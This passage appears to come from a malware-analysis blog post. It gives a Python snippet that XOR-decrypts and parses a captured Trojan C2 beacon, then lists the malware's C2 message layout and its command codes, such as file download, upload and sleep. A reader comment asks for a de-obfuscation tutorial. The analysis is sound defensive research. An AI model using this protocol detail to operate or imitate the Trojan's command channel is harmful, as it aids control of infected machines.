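    """XOR data against key, byte for byte, starting at key[0].
    Decrypting and encrypting are the same operation."""
    if len(key) < len(data):
        raise ValueError("key stream too short: %d bytes for %d of data" % (len(key), len(data)))
    return bytes(d ^ k for d, k in zip(data, key))


def decrypt_beacon() -> bytes:
    return xor_stream(POST_BODY, KEY_STREAM)


def parse_beacon(plain: bytes) -> dict:
    """Read the decrypted body using the layout the analysis gives for C2 replies:
    byte 0 is 0x02 and bytes 2-5 hold the data length (0x5A = 90 here, matching
    Content-Length). The IP at 6 and the host name at 10 are my labels for what
    the dump shows; the write-up does not describe them."""
    return {
        "magic": plain[0],
        "length": int.from_bytes(plain[2:6], "little"),
        "ip": ".".join(str(b) for b in plain[6:10]),
        "host": plain[10:plain.index(b"\0", 10)].decode("latin-1"),
    }


if __name__ == "__main__":
    plain = decrypt_beacon()
    print(plain == PLAIN_BODY, parse_beacon(plain))
```

- Because the body is XORed from key byte 0 every time, two beacons of the same length differ only where their plaintext differs; capturing one known-plaintext beacon (this one, for instance) hands you the first 90 bytes of the key without ever opening SOUND735.WAV.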
- The data received from the C2 node is expected to be encrypted using the same key.
- The structure of the (decrypted) data received from the C2 node is as follows:
- BYTE 0 = must be 0x02
- BYTE 1 = was not checked in my tests
- BYTES 2-5 = length of data
- BYTES 6-29 = not checked
- BYTE 30 = command (0x03 to 0x08, 0x0A and 0x0D)
- BYTES 31-34 = file offset (if applicable)
- BYTES 35-?? = string (filename or sleep time). The filename can include a path; otherwise it defaults to system32.
- Here is what I got for the commands (byte 30) that this Trojan interprets:
- 0x03 – Sleep for 50 seconds.
- 0x04 – Download a file (to the victim).
- 0x05 – Upload a file (to the C2 node).
- 0x06 – Sleep for 50 seconds.
- 0x07 – Sleep for 50 seconds.
- 0x08 – Does something with a file (possibly executes it; not confirmed).
- 0x0A – Long sleep, in 5-second chunks.
- 0x0D – Set the sleep time in the wineck.dat file (remember the sleep time was not set initially).
- This is as far as I am taking this one.
I know it would be time-consuming, but one of these days could you do a very step-by-step write-up of how (including what tools and commands) you de-obfuscate a malicious file and how exactly you "carve" out an exe? Some day even just one write-up like this would be very, very helpful!
I will consider adding a Tutorial category.